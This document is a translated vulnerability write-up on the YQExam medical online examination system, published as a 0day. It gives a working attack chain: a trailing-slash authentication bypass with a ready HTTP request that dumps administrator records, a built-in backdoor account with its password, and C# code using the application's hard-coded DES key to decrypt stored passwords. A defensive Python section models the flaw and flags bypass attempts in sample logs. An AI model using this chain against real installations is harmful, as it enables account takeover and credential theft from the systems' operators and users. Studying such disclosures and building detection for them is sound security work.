Preface
Affected versions: <= V 3.26.9
Authentication bypass
The check that can be bypassed is in YQExam.Web.Filter.AuthorValid.AuthorValid.
If the path ends in ".aspx", ".ascx" or ".ashx" it enters the permission check, except for "/Default.aspx", "/Register.aspx" and a few other pages:
if (absolutePath.EndsWith(".aspx", StringComparison.CurrentCultureIgnoreCase) || absolutePath.EndsWith(".ascx", StringComparison.CurrentCultureIgnoreCase) || absolutePath.EndsWith(".ashx", StringComparison.CurrentCultureIgnoreCase))
{
    // Public pages are exempted from the permission check
    if (absolutePath.EndsWith("/Default.aspx", StringComparison.CurrentCultureIgnoreCase) || absolutePath.EndsWith("/Register.aspx", StringComparison.CurrentCultureIgnoreCase) || absolutePath.EndsWith("/MediaFile.aspx", StringComparison.CurrentCultureIgnoreCase) || absolutePath.EndsWith("/Login.aspx", StringComparison.CurrentCultureIgnoreCase))
    {
        return;
    }
    // ... permission check follows (omitted in the post)
}
Since only the literal suffix of the path is tested, a path ending in "/" never reaches the permission check, so appending a trailing "/" bypasses it.
Privilege bypass to read passwords
The password-reading handler is YQExam.Web.Manager.Ajax.User.
The operation type is selected by the oper parameter; the ones of interest are getManagerList and getUserList, which return user information.
This code checks the current login state: if the caller is not logged in as a system administrator, only ordinary administrators' records are returned:
if (!ManagerBll.IsAdmin(PageClass.getCurrAdminId("")))
{
    text2 += " AND Admininfo.intAdminType=0";
}
Constructing the PoC
POST /Manage/Ajax/User.ashx/ HTTP/1.1
Host: 127.0.0.1:8002
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

oper=getManagerList&name=&code=&depart=&page=1&rows=15
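As an added example (not code from the post or from YQExam), the following Python mirrors the filter's suffix test next to a hardened variant that strips ASP.NET path-info before testing the extension, and runs both over a few constructed access-log lines to flag requests that the suffix test waves through. The log lines, IP addresses and function names are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Extensions the filter gates on and the pages it exempts, as quoted in the post.
GATED_EXTENSIONS = (".aspx", ".ascx", ".ashx")
PUBLIC_PAGES = ("/default.aspx", "/register.aspx", "/mediafile.aspx", "/login.aspx")

# Handler name followed by optional ASP.NET path-info ("/..." after the extension).
HANDLER_WITH_PATHINFO = re.compile(
    r"^(?P<file>.*?\.(?:aspx|ascx|ashx))(?P<info>/.*)?$", re.IGNORECASE)

LOG_LINE = re.compile(  # combined log format: client IP, method, target, status
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines (not real traffic); the second and third targets carry
# path-info after User.ashx, which is exactly what the suffix test fails to see.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Login.aspx HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "POST /Manage/Ajax/User.ashx/ HTTP/1.1" 200 2048',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /Manage/Ajax/User.ashx/x?oper=getUserList HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /Manage/Ajax/User.ashx HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /Styles/site.css HTTP/1.1" 200 100',
]

def suffix_check_requires_auth(absolute_path: str) -> bool:
    # Mirror of the original filter: only the literal suffix of the URL is examined,
    # so "/User.ashx/" ends in "/" and never reaches the permission check.
    p = absolute_path.lower()
    if not p.endswith(GATED_EXTENSIONS):
        return False
    return not p.endswith(PUBLIC_PAGES)

def hardened_requires_auth(absolute_path: str) -> bool:
    # Strip path-info first (like testing Request.FilePath instead of the full URL),
    # then apply the same gate, so the handler is recognised whatever follows it.
    m = HANDLER_WITH_PATHINFO.match(absolute_path)
    file_path = m.group("file") if m else absolute_path
    return suffix_check_requires_auth(file_path)

def find_pathinfo_bypass_attempts(log_lines):
    # Report (ip, path, status) for requests the suffix test waves through but the
    # hardened test would gate: the trailing-slash bypass candidates worth alerting on.
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = urlsplit(m.group("target")).path
        if hardened_requires_auth(path) and not suffix_check_requires_auth(path):
            hits.append((m.group("ip"), path, m.group("status")))
    return hits
```

Percent-decode the request target before matching if the server logs it raw, otherwise an encoded slash is missed.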
Password decryption
At login the user type is checked.
Since the code I have is version 3.25, and before that version the code contained a built-in account YuanqiuExam/1398311407513708315661 that logs in directly with system administrator privileges.
In the main login code, the password turns out to be DES-encrypted:
dataTable = SqliteHelper.Query("SELECT * FROM AdminInfo WHERE IFNULL(lngDeleteOperatorId,0) = 0 AND LOWER(strOperatorName)=LOWER(@strOperatorName) AND strPassword=@strPassword LIMIT 0,1", new SQLiteParameter[]
{
    new SQLiteParameter("@strOperatorName", strAdminName),
    new SQLiteParameter("@strPassword", DES.EncryptPassword(strPassword))
});
Following the DES encryption file, the encryption and decryption functions are already written, so they can be used directly:
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace YQExam.Common.Crypt
{
    public sealed class DES
    {
        static void Main(string[] args)
        {
            // Console.WriteLine(DES.EncryptPassword("kw666666"));
            Console.WriteLine("输入密文:"); // prompt: enter ciphertext
            string text = Console.ReadLine();
            // Hard-coded key and XOR sub-key taken from the application's own code
            Console.WriteLine(DES.Decrypt1(text, "df6dsf5s", 69));
        }

        private static string Decrypt1(string strData, string strKey, int mintSubKey)
        {
            // Pad the key to 8 bytes (the DES key length); the padding character did not
            // survive extraction, and for the 8-character key above this loop never runs
            while (strKey.Length < 8)
            {
                strKey += "�";
            }
            string result;
            try
            {
                DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider();
                // The key bytes are also used as the IV
                byte[] bytes = Encoding.Default.GetBytes(strKey);
                // Stored form is hex; each byte is XORed with the sub-key before DES decryption
                byte[] array = new byte[strData.Length / 2];
                for (int i = 0; i < strData.Length / 2; i++)
                {
                    int num = Convert.ToInt32(strData.Substring(i * 2, 2), 16);
                    array[i] = (byte)(num ^ mintSubKey);
                }
                MemoryStream memoryStream = new MemoryStream();
                CryptoStream cryptoStream = new CryptoStream(memoryStream, descryptoServiceProvider.CreateDecryptor(bytes, bytes), CryptoStreamMode.Write);
                cryptoStream.Write(array, 0, array.Length);
                cryptoStream.FlushFinalBlock();
                cryptoStream.Close();
                result = Encoding.Default.GetString(memoryStream.ToArray());
            }
            catch
            {
                // Any hex-decoding or padding failure yields an empty string
                result = "";
            }
            return result;
        }

        private const int intSubKey = 63;
    }
}
Originally published on the WeChat public account 安全绘景: 0day | Analysis of the arbitrary user login vulnerability in the 远秋 Medical Online Examination System